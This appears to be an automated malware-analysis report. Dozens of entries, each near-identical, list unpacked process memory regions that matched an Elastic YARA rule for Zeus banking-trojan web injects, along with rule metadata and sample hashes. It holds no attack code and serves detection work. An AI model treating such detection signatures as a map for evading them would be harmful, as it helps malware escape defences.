Source: 2.2.svchost.exe.2a02000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.841298.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c13c00.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nFjEHtbDTFjy.exe.2562000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.OjKmJJm2YT.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.nFjEHtbDTFjy.exe.2dc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nFjEHtbDTFjy.exe.1472000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c13c00.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.888400.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.nFjEHtbDTFjy.exe.29a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.nFjEHtbDTFjy.exe.2a10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nFjEHtbDTFjy.exe.27f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.nFjEHtbDTFjy.exe.c92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2a56c00.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2a02000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
